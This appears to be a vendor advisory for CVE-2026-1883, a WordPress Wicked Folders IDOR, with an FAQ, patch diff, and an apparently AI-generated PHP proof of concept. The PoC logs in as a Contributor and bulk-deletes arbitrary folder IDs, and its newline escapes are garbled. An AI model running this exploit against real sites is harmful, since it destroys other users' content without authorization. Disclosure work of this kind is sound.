What is CVE-2026-1883?

CVE-2026-1883 is a vulnerability in the Wicked Folders plugin for WordPress, allowing authenticated users with Contributor-level access or higher to delete arbitrary folders created by other users. This is due to an Insecure Direct Object Reference (IDOR) in the delete_folders() function, where user-controlled folder IDs are not properly validated.

Who is affected by this vulnerability?

All users of the Wicked Folders plugin version 4.1.0 and earlier are affected by this vulnerability. Specifically, authenticated users with Contributor-level access or higher can exploit this flaw to delete folders belonging to other users.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Wicked Folders plugin installed on your WordPress site. If it is version 4.1.0 or earlier, your site is vulnerable to CVE-2026-1883.

How can I fix this vulnerability?

The vulnerability has been patched in version 4.1.1 of the Wicked Folders plugin. To fix the issue, update the plugin to the latest version available in the WordPress plugin repository.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity level for this vulnerability. It suggests that while the vulnerability can lead to significant issues, the conditions for exploitation may require specific access or knowledge.

What are the practical risks of this vulnerability?

If exploited, this vulnerability allows an attacker to delete folders created by other users, which can disrupt content management workflows and lead to data loss or disorganization. This can severely impact collaborative environments.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an authenticated user can authenticate to a WordPress site and issue delete requests for arbitrary folder IDs. It illustrates the lack of proper authorization checks that allow the deletion of folders belonging to other users.

What steps can I take to mitigate this vulnerability?

In addition to updating the plugin, consider implementing role-based access controls to limit the capabilities of users with Contributor-level access. Regularly audit user permissions and monitor folder deletion activities.

Is there any additional information available about this vulnerability?

For more detailed information, you can refer to the official WordPress plugin repository for Wicked Folders, as well as security advisories from reputable sources that discuss CVE-2026-1883.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the plugin until it can be updated. Additionally, review user roles and permissions to restrict access to the affected functionality.

Can this vulnerability be exploited remotely?

Yes, the vulnerability can be exploited remotely, but it requires the attacker to have authenticated access to the WordPress site with at least Contributor-level permissions.

What is Insecure Direct Object Reference (IDOR)?

Insecure Direct Object Reference (IDOR) is a type of access control vulnerability where an attacker can manipulate user-controlled input to access or modify resources they should not have access to. In this case, it allows unauthorized deletion of folders.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1883: Wicked Folders <= 4.1.0 – Insecure Direct Object Reference to Authenticated (Contributor+) Arbitrary Folder Deletion (wicked-folders)

CVE ID CVE-2026-1883

Plugin wicked-folders

Severity Medium (CVSS 4.3)

CWE 639

Vulnerable Version 4.1.0

Patched Version 4.1.1

Disclosed March 13, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1883:
The vulnerability is an Insecure Direct Object Reference (IDOR) in the Wicked Folders WordPress plugin. The root cause is insufficient authorization validation in the delete_folders_permissions_check function within the REST API endpoint handler. Prior to version 4.1.1, the function only checked if the user had the edit_posts capability, without verifying ownership or permissions for the specific folder IDs being deleted. The function accepted a user-controlled folder_ids parameter via the REST API request. This allowed authenticated users with Contributor-level access or higher to delete folders belonging to other users by submitting arbitrary term IDs. The patch modifies the delete_folders_permissions_check function in wicked-folders/classes/rest-api/v1/folder-api.php. The updated implementation iterates through each folder ID in the folder_ids parameter and calls current_user_can(‘delete_term’, $term_id) for each term. This ensures the user has explicit deletion rights for every folder targeted by the operation. The same permission check logic was also applied to the update_folder_permissions_check and delete_folder_permissions_check functions for consistency. If exploited, this vulnerability allows attackers to delete arbitrary organizational folders created by other users, potentially disrupting content management workflows and causing data disorganization.

Differential between vulnerable and patched code

Code Diff

--- a/wicked-folders/classes/folder-collection.php
+++ b/wicked-folders/classes/folder-collection.php
@@ -68,6 +68,17 @@
             if ( $folder->id === $item->id ) {
                 unset( $this->items[ $index ] );

+                // Re-index. I don't understand why this is needed but leaving it out
+                // can prevent looping over the collection sometimes
+                $this->items = array_values( $this->items );
+
+                // Adjust index if the removed item is the same or before the current index.
+                // Setting to -1 is okay because the next() method will increment it (although
+                // then current() will be wrong so perhaps this needs to be implemented differently?)
+                if ( $index <= $this->index ) {
+                    $this->index--;
+                }
+
                 break;
             }
         }
--- a/wicked-folders/classes/post-hierarchy-dynamic-folder.php
+++ b/wicked-folders/classes/post-hierarchy-dynamic-folder.php
@@ -163,10 +163,14 @@

         if ( 'dynamic_hierarchy_0' != $id ) {
             $post_id            = ( int ) substr( $id, 18 );
-            $parent             = 'dynamic_hierarchy_' . wp_get_post_parent_id( $post_id );
-            $ancestors[]        = $parent;
-            $parent_ancestors   = $this->get_ancestor_ids( $parent );
-            $ancestors          = array_merge( $ancestors, $parent_ancestors );
+            $parent_id          = wp_get_post_parent_id( $post_id );
+
+            if ( $parent_id ) {
+                $parent             = 'dynamic_hierarchy_' . $parent_id;
+                $ancestors[]        = $parent;
+                $parent_ancestors   = $this->get_ancestor_ids( $parent );
+                $ancestors          = array_merge( $ancestors, $parent_ancestors );
+            }
         } else {
             $ancestors[] = 'dynamic_root';
         }
--- a/wicked-folders/classes/rest-api/v1/folder-api.php
+++ b/wicked-folders/classes/rest-api/v1/folder-api.php
@@ -277,27 +277,41 @@
     }

     public function update_folder_permissions_check( $request ) {
-        $allowed 	= current_user_can( 'edit_posts' );
         $user_id 	= get_current_user_id();
         $term_id    = $request->get_param( 'id' );
         $post_type  = $request->get_param( 'postType' );
         $taxonomy   = Wicked_Folders::get_tax_name( $post_type );
+        $allowed 	= current_user_can( 'edit_term', $term_id );

         return apply_filters( 'wicked_folders_can_edit_folder', $allowed, $user_id, $term_id, $taxonomy );
     }

     public function delete_folder_permissions_check( $request ) {
-        $allowed 	= current_user_can( 'edit_posts' );
         $user_id 	= get_current_user_id();
         $term_id    = $request->get_param( 'id' );
         $post_type  = $request->get_param( 'postType' );
         $taxonomy   = Wicked_Folders::get_tax_name( $post_type );
+        $allowed 	= current_user_can( 'delete_term', $term_id );

         return apply_filters( 'wicked_folders_can_delete_folder', $allowed, $user_id, $term_id, $taxonomy );
     }

     public function delete_folders_permissions_check( $request ) {
-        return current_user_can( 'edit_posts' );
+        $user_id 	= get_current_user_id();
+        $post_type  = $request->get_param( 'post_type' );
+        $folder_ids = $request->get_param( 'folder_ids' );
+        $taxonomy   = Wicked_Folders::get_tax_name( $post_type );
+
+        foreach ( $folder_ids as $term_id ) {
+            $allowed = current_user_can( 'delete_term', $term_id );
+            $allowed = apply_filters( 'wicked_folders_can_delete_folder', $allowed, $user_id, $term_id, $taxonomy );
+
+            if ( ! $allowed ) {
+                return false;
+            }
+        }
+
+        return true;
     }

     public function assign_items_permissions_check( $request ) {
--- a/wicked-folders/dist/folders.asset.php
+++ b/wicked-folders/dist/folders.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('wp-api-fetch', 'wp-components', 'wp-data', 'wp-data-controls', 'wp-element', 'wp-hooks', 'wp-i18n'), 'version' => 'f525e29e4d05448220d7');
+<?php return array('dependencies' => array('wp-api-fetch', 'wp-components', 'wp-data', 'wp-data-controls', 'wp-element', 'wp-hooks', 'wp-i18n'), 'version' => 'b0b81f2c83aed6394b8c');
--- a/wicked-folders/wicked-folders.php
+++ b/wicked-folders/wicked-folders.php
@@ -4,7 +4,7 @@
 Plugin Name: Wicked Folders
 Plugin URI: https://wickedplugins.com/wicked-folders/
 Description: Organize your pages into folders.
-Version: 4.1.0
+Version: 4.1.1
 Author: Wicked Plugins
 Author URI: https://wickedplugins.com/
 Text Domain: wicked-folders

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1883 - Wicked Folders <= 4.1.0 - Insecure Direct Object Reference to Authenticated (Contributor+) Arbitrary Folder Deletion
<?php
$target_url = 'https://example.com';
$username = 'contributor_user';
$password = 'contributor_password';
$victim_folder_ids = array(123, 456, 789); // Arbitrary term IDs to delete

// Step 1: Authenticate with WordPress to obtain cookies/nonce
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $admin_url,
    'testcookie' => '1'
)));
$response = curl_exec($ch);

// Step 2: Extract the REST API nonce (wp_rest) from admin page
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);
preg_match('/"wpApiSettings".*?"nonce":"([a-f0-9]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

// Step 3: Craft malicious REST API request to delete arbitrary folders
$rest_url = $target_url . '/wp-json/wicked-folders/v1/folders/bulk-delete';
$payload = json_encode(array(
    'folder_ids' => $victim_folder_ids,
    'post_type' => 'post' // Can be any post type managed by the plugin
));

curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $nonce
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code === 200) {
    echo "Successfully deleted folders: " . implode(', ', $victim_folder_ids) . "n";
    echo "Response: $responsen";
} else {
    echo "Attack failed with HTTP code: $http_coden";
    echo "Response: $responsen";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-1883?
Overview of the vulnerability
CVE-2026-1883 is a vulnerability in the Wicked Folders plugin for WordPress, allowing authenticated users with Contributor-level access or higher to delete arbitrary folders created by other users. This is due to an Insecure Direct Object Reference (IDOR) in the delete_folders() function, where user-controlled folder IDs are not properly validated.
Who is affected by this vulnerability?
Identifying impacted users
All users of the Wicked Folders plugin version 4.1.0 and earlier are affected by this vulnerability. Specifically, authenticated users with Contributor-level access or higher can exploit this flaw to delete folders belonging to other users.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Wicked Folders plugin installed on your WordPress site. If it is version 4.1.0 or earlier, your site is vulnerable to CVE-2026-1883.
How can I fix this vulnerability?
Updating the plugin
The vulnerability has been patched in version 4.1.1 of the Wicked Folders plugin. To fix the issue, update the plugin to the latest version available in the WordPress plugin repository.
What does the CVSS score of 4.3 indicate?
Understanding the severity rating
A CVSS score of 4.3 indicates a medium severity level for this vulnerability. It suggests that while the vulnerability can lead to significant issues, the conditions for exploitation may require specific access or knowledge.
What are the practical risks of this vulnerability?
Potential impacts on WordPress sites
If exploited, this vulnerability allows an attacker to delete folders created by other users, which can disrupt content management workflows and lead to data loss or disorganization. This can severely impact collaborative environments.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploit mechanism
The proof of concept provided shows how an authenticated user can authenticate to a WordPress site and issue delete requests for arbitrary folder IDs. It illustrates the lack of proper authorization checks that allow the deletion of folders belonging to other users.
What steps can I take to mitigate this vulnerability?
Preventive measures
In addition to updating the plugin, consider implementing role-based access controls to limit the capabilities of users with Contributor-level access. Regularly audit user permissions and monitor folder deletion activities.
Is there any additional information available about this vulnerability?
Resources for further reading
For more detailed information, you can refer to the official WordPress plugin repository for Wicked Folders, as well as security advisories from reputable sources that discuss CVE-2026-1883.
What should I do if I cannot update the plugin immediately?
Temporary workarounds
If you cannot update the plugin immediately, consider disabling the plugin until it can be updated. Additionally, review user roles and permissions to restrict access to the affected functionality.
Can this vulnerability be exploited remotely?
Understanding access requirements
Yes, the vulnerability can be exploited remotely, but it requires the attacker to have authenticated access to the WordPress site with at least Contributor-level permissions.
What is Insecure Direct Object Reference (IDOR)?
Explanation of the vulnerability type
Insecure Direct Object Reference (IDOR) is a type of access control vulnerability where an attacker can manipulate user-controlled input to access or modify resources they should not have access to. In this case, it allows unauthorized deletion of folders.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations